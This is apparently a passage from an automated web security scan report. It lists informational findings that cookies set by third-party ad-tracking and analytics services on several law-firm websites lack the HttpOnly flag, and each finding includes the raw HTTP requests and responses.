var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-12 15:27
...[SNIP]...
18.65. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=5&gen=100&sid=4dcc04a295bfe7b7&callback=_ate.ad.hrr&pub=xa-4b4b96e85d543881&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2F&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DTydings%2B%2526%2BRosenberg%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&1i51wom HTTP/1.1
Host: cf.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305201657.1OD|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 12 May 2011 16:02:43 GMT
Set-Cookie: di=1305201657.1OD|1305200976.60|1305200976.1FE; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:02:43 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11-Jun-2011 16:02:43 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Thu, 12 May 2011 16:02:43 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});
18.66. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.tydingslaw.com%2fContent.aspx%3ftopic%3dAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back HTTP/1.1
Host: cspix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sl6x0063o010k03505; ipinfo=2ll12l40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; acs=014020a0g0h1lkaebsxzt1sl6xxzt1sl6xxzt1p28s; rdrlst=4041194lkmm960cube0043o0110rdll12l4000000023o010znmlkmhha000000053o0110tell2zip000000013o01; sglst=20k0s9ullkzgkk03iy50023n000k00500arrll12l401wxl0013n000k00500c25ll2zip000000013o010k0150156bll2zip000000013o010k01501ag2lkmm960gd9j0043o010k035049rylkmhha0cz3a0023f000j00500a6slkzgkk03iy50023n000k00500bnzlkmhha0gi1f0043n000k00500cgzlkmhha0gi1f0043n000k005000tilkmhha0gi1f0053o010k03505ahhll2zip000000013o010k015010klll12l401wxl0023o010k02502a6rlkmhha0cz3a0023f000j00500dlell12l401wxl0023o010k02502abflkmhha0cz3a0023f000j00500bo0ll2zip000000013o010k01501alhll2zip000000013o010k01501dg4lkmhha0gi1f0043n000k00500942ll2zip000000013o010k01501943lkzgkk03iy50023n000k00500

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1lkaebsxzt1sxc7xzt1sxc7xzt1sxc7xzt1sxc7xzt1sxc7; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 16:11:59 GMT; Path=/
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sxc70073o020k04506; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 16:11:59 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4051196ll3bnz000000013o011194lkmm960cube0053o0210rdll12l4000000033o020znmlkmhha000000063o0210tell2zip000000023o02; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 16:11:59 GMT; Path=/
Set-Cookie: sglst=20p0sarrll12l401wxl0013n000k00500ag2lkmm960gpet0053o020k045059rylkmhha0cz3a0023f000j00500a6slkzgkk03iy50023n000k00500bnzlkmhha0gi1f0043n000k00500a6rlkmhha0cz3a0023f000j005000klll12l40292v0033o020k035034xcll3bnz000000013o010k01501bvsll3bnz000000013o010k01501dlell12l40292v0033o020k03503abflkmhha0cz3a0023f000j00500bo0ll2zip00c5a0023o020k025025eell3bnz000000013o010k01501alhll2zip00c5a0023o020k02502dg4lkmhha0gi1f0043n000k0050064yll3bnz000000013o010k01501942ll2zip00c5a0023o020k02502943lkzgkk03iy50023n000k005009ullkzgkk03v3f0033o010k02502c25ll2zip00c5a0023o020k0250256all3bnz000000013o010k0150156bll2zip000000023o020k025020tilkmhha0gu6p0063o020k04506cgzlkmhha0gi1f0043n000k00500ahhll2zip00c5a0023o020k02502; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 16:11:59 GMT; Path=/
Set-Cookie: vstcnt=417s010r054sbno118e10f24smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p20d20e2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 16:11:59 GMT; Path=/
Location: http://r.openx.net/set?pid=1c6323e9-0811-5464-3af4-c00f47248395&rtb=1xcfgwn0ixqhg
Content-Length: 0
Date: Thu, 12 May 2011 16:11:58 GMT

18.67. http://d1.openx.org/spc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /spc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /spc.php?zones=144985%7C144986%7C145005%7C145008%7C145221%7C145222&source=&r=32965652&charset=UTF-8&loc=http%3A//baxterhall.com/ HTTP/1.1
Host: d1.openx.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://baxterhall.com/

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:44:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=0873c3355b06579d42d07f9a5fc35a4d; expires=Fri, 11-May-2012 18:44:45 GMT; path=/
Content-Length: 192
Connection: close
Content-Type: application/x-javascript; charset=UTF-8

var OA_output = new Array();
OA_output['144985'] = '';

OA_output['144986'] = '';

OA_output['145005'] = '';

OA_output['145008'] = '';

OA_output['145221'] = '';

OA_output['145222'] = '';

18.68. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.pomerantzlaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcases.html%3Faction%3DcaseDetail%26CaseID%3D102&g0rr6z HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 214
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 17:03:35 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 17:03:35 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219815.1EY; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:59:25 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 17:03:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 17:03:35 GMT
Connection: close

_ate.ad.hpr({"urls":["http://aidps.atdmt.com/AI/Api/v1/UserRest.svc/Provider/39CD8FF4-531A-4266-A340-45548C451F45/User/4dc048d9159e4ae3/gif"],"segments" : ["1EY"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxM
...[SNIP]...
18.69. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.tydingslaw.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.tydingslaw.com/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.tydingslaw.com%2FContent.aspx%3Ftopic%3DAnother_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back&ref=http%3A%2F%2Fwww.tydingslaw.com%2FPracticesIndustries%2Fpid%2F7%2FCommercial-and-Business-Litigation-.aspx&3vpnn2 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1305201657.1OD|1305200976.1FE|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 510
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:11:57 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:11:57 GMT; Path=/
Set-Cookie: di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 16:11:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:11:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:11:57 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degree
...[SNIP]...
18.70. http://ehg-findlaw.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-findlaw.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=wp146&hb=WR561118HFRZ%3BDM54040296DE&cd=1&hv=6&n=/JDTP-Listed-in-Martindale-Hubbells-Bar-Register-of-Preeminent-Lawyers.asp%3B/SITE%20PAGE&con=&vcon=/CM/NewsResources%3B/1511516/jdtplaw/www.jdtplaw.com/PAGES&tt=none&ja=y&dt=11&zo=300&lm=1305218932000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=13&cy=u&hp=u&ln=en-US&vpc=HBX0100u&vjs=HBX0101.01u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=fscontrol&c2=FIRMSITE%20IV&c3=&c4=&customerid=&lv.id=&lv.pos=&ra=&rf=http%3A//www.jdtplaw.com/&pl=Java%20Deployment%20Toolkit%206.0.240.7%3AGoogle%20Update%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AWPI%20Detector%201.3%3A HTTP/1.1
Host: ehg-findlaw.hitbox.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jdtplaw.com/CM/NewsResources/JDTP-Listed-in-Martindale-Hubbells-Bar-Register-of-Preeminent-Lawyers.asp
Cookie: CTG=1305218905; DM54040296DEV6=V1rrrrr"rz%XrQB%eQe@^%riQXzBz^e%zXCi"%XrQB%iQQ@z%XrQB%eQe@"%XrQB%i^rQ"%XrQB%iQQ@eXrrr@"XBXzNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe@6X6r6r6X6r6r6%*ZIcdF:TxBQBr_amIhc:xBQBrf2_DFxBQBrGacdaTGIDWOxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6B6r6X6r"V6B6r6X6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6%^zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(A6X%XX%Qi6T~_O~IkX6kkk|T~_O~Ik|c:m6YjV(}6})8(HYjV(; WSS_GW=V1z%XrQB%eQe@; WR540427EECAV6=V1rrrrr"rz%XrQB%eQe@^%riQXzBz^^QzBQ"%XrQB%iQQ@z%XrQB%eQe@"%XrQB%iQiB"%XrQB%iQQ@eXrrr@"BQzNV::W~a`G:ka~~xBrfhIcOfmITz(xB$YhIcf2cajhaIFxB$(mG~:3maTfxB[5~I2mFxB[0Iu:hxB[ya~If2:TFxB(IFGz7}zA6YhIcf2cajhaIF6(mG~:3maTf"5~I2mF"0Iu:h"ya~If2:TF|IFGA65l65DFf:m65IFa"}fD_2aF|IFG; WR540421FKRSV6=V1rrrrr"rz%XrQB%ee%@rBrQCQzBz%%CCzr"%XrQB%i^rQz%XrQB%ee%@"%XrQB%i^rQ"%XrQB%i^rQrBre@%"rzNV::W~a`Ta~F:TxBr~aq2TaxBr_a~DcIxBrxBexBrO:hFfz(xB$YhIcf2cajhaIFxB$)TFf2fDf2:TI~xB[02f2WIf2:TxB[IT_xB[5:TFD~f2TWxB(IFGz7}zA6YhIcf2cajhaIF6)TFf2fDf2:TI~"02f2WIf2:T"IT_"5:TFD~f2TW|IFG; WR561118HFRZV6=V1rrrrr"rz%XrQB%eeXeBrreeBz%zrzr"%XrQB%eeXez%XrQB%eeXe"%XrQB%eeXe"%XrQB%eeXeBrreeB"rzNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[MIcdF:TxBr[alIhc:xBr82_DFxBrYacdaTGIDWOxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:48:53 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM54040296DEV6=V1rrrrr"rz%XrQB%eQe@^%riQXzBz^e%zX@e"%XrQB%iQQ@z%XrQB%eQe@"%XrQB%i^XX"%XrQB%iQQ@eXrrr@"BizNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe@6X6r6r6X6r6r6%*ZIcdF:TxBQBr_amIhc:xBQBrf2_DFxBQBrGacdaTGIDWOxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6B6r6X6r"V6B6r6X6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6%^zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(A6X%XX%Qi6T~_O~IkX6kkk|T~_O~Ik|c:m6YjV(}6})8(HYjV(A6%Q%%Q%e6Z_fG~Ik6kkk|Z_fG~Ik|c:m6YjV(}6})8(HYjV(; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:48:53 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrQB%eQe@; path=/; domain=.hitbox.com; expires=Fri, 11-May-2012 16:48:53 GMT; max-age=31536000
Set-Cookie: CTG=1305218933; path=/; domain=.hitbox.com; expires=Thu, 19-May-2011 16:48:53 GMT; max-age=604800
Set-Cookie: WR561118HFRZV6=V1rrrrr"rz%XrQB%eeXeBrreeBzBz%%C^zr"%XrQB%i^XXz%XrQB%eeXe"%XrQB%i^XX"%XrQB%i^XXe@r%rr"rzNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz(xB$5lxB$#akFyaF:DhcaFxB$M[8YxB[02Ffa_xB[2TxB[lIhf2T_I~axB['Duua~~FxB[>IhxB[yaW2FfahxB[:7xB[Yhaam2TaTfxB[0Ik3ahFxB(IFGz7}zA65l6#akFyaF:DhcaF6M[8Y"02Ffa_"2T"lIhf2T_I~a"'Duua~~F">Ih"yaW2Ffah":7"Yhaam2TaTf"0Ik3ahF|IFG; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:48:53 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Thu, 12 May 2011 16:48:54 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
18.71. http://ehg-findlaw.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-findlaw.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=wp151&hb=WR540427EECA%3BDM54040296DE&cd=1&hv=6&n=/Employment-Claims-Labor-Relations.asp%3B/SITE%20PAGE&con=&vcon=/PracticeAreas%3B/2069028/powelltrachtman2/www.powelltrachtman.com/PAGES&tt=none&ja=y&dt=11&zo=300&lm=1305218555000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=13&cy=u&hp=u&ln=en-US&vpc=HBX0100u&vjs=HBX0101.01u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=fscontrol&c2=FS%20IV%3A%20FIRMSITE%20IV&c3=&c4=&customerid=&lv.id=&lv.pos=&ra=&rf=http%3A//www.powelltrachtman.com/&pl=Java%20Deployment%20Toolkit%206.0.240.7%3AGoogle%20Update%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AWPI%20Detector%201.3%3A HTTP/1.1
Host: ehg-findlaw.hitbox.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.powelltrachtman.com/PracticeAreas/Employment-Claims-Labor-Relations.asp
Cookie: CTG=1305216636; DM54040296DEV6=V1rrrrr"rz%XrQB%eQe@^%riQXz%zrze^"%XrQB%eQe@z%XrQB%eQe@"%XrQB%eeXe"%XrQB%eQe@^%riQX"%^zNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe@6%6r6r6X6r6r6%*ZIcdF:TxBQBr_amIhc:xBQBrf2_DFxBQBrGacdaTGIDWOxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6%6r6X6r"V6%6r6X6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6%^zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(A6X%XX%Qi6T~_O~IkX6kkk|T~_O~Ik|c:m6YjV(}6})8(HYjV(A6%Q%%Q%e6Z_fG~Ik6kkk|Z_fG~Ik|c:m6YjV(}6})8(HYjV(zOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; WSS_GW=V1z%XrQB%eQe@; WR540427EECAV6=V1rrrrr"rz%XrQB%eQe@^%riQXz%zrzr"%XrQB%eQe@z%XrQB%eQe@"%XrQB%eQe@"%XrQB%eQe@^%riQX"rzNV::W~a`G:ka~~xBrfhIcOfmITz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[Y:ka~~xBr8hIcOfmITxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; WR540421FKRSV6=V1rrrrr"rz%XrQB%ee%@rBrQCQz%zrzr"%XrQB%ee%@z%XrQB%ee%@"%XrQB%ee%@"%XrQB%ee%@rBrQCQ"rzNV::W~a`Ta~F:TxBr~aq2TaxBr_a~DcIxBrxBexBrO:hFfz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[#a~F:TxBr0aq2TaxBr_a0DcIxBrxBQBexBr':hFfxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I; WR561118HFRZV6=V1rrrrr"rz%XrQB%eeXeBrreeBz%zrzr"%XrQB%eeXez%XrQB%eeXe"%XrQB%eeXe"%XrQB%eeXeBrreeB"rzNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz(xB$[a7ID~fz7}zA6[a7ID~fzOffGxXjxB$xB$kkkxB(W::W~axB(c:mxB$FaIhcOxX$pxX[MIcdF:TxBr[alIhc:xBr82_DFxBrYacdaTGIDWOxBe2axX[Df7xB[ixBe:axX[Df7xB[ixBeIpxX[fxBeh~FxX[:hWxB(m:U2~~IxXjaTxB[=}xXj:772c2I~xBec~2aTfxX[72ha7:KxB[I

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:42:38 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM54040296DEV6=V1rrrrr"rz%XrQB%eQe@^%riQXzBz^e%zr"%XrQB%iQQiz%XrQB%eQe@"%XrQB%iQQi"%XrQB%iQQiQere@e"rzNV::W~a`ZIcdF:TxBr_amIhc:xBrf2_DFxBrGacdaTGIDWOz5)6<N5xB[<hWIT2cNa3k:h_F6%Q@@iXeirr6%XrQB%eQe@6X6r6r6X6r6r6%*ZIcdF:TxBQBr_amIhc:xBQBrf2_DFxBQBrGacdaTGIDWOxB5V::W~a6W::W~axB(c:m6b686r6b"56<N6B6r6X6r"V6B6r6X6rz(xB$Bre^rBixB$G:ka~~fhIcOfmITBxB$kkkxB(G:ka~~fhIcOfmITxB(c:mxB$YjV(}xB$})8(xBrYjV(z7}z)OuKr6%^zA6Bre^rBi6G:ka~~fhIcOfmITB6kkk|G:ka~~fhIcOfmIT|c:m6YjV(}6})8(HYjV(; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:42:38 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrQB%eQe@; path=/; domain=.hitbox.com; expires=Fri, 11-May-2012 16:42:38 GMT; max-age=31536000
Set-Cookie: CTG=1305218558; path=/; domain=.hitbox.com; expires=Thu, 19-May-2011 16:42:38 GMT; max-age=604800
Set-Cookie: WR540427EECAV6=V1rrrrr"rz%XrQB%eQe@^%riQXzBz^^ezr"%XrQB%iQQiz%XrQB%eQe@"%XrQB%iQQi"%XrQB%iQQiQere@e"rzNV::W~a`G:ka~~xBrfhIcOfmITz(xB$YhIcf2cajhaIFxB$(mG~:3maTfxB[5~I2mFxB[0Iu:hxB[ya~If2:TFxB(IFGz7}zA6YhIcf2cajhaIF6(mG~:3maTf"5~I2mF"0Iu:h"ya~If2:TF|IFG; path=/; domain=ehg-findlaw.hitbox.com; expires=Fri, 11-May-2012 16:42:38 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Thu, 12 May 2011 16:42:39 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
18.72. http://ehg-findlaw.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-findlaw.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

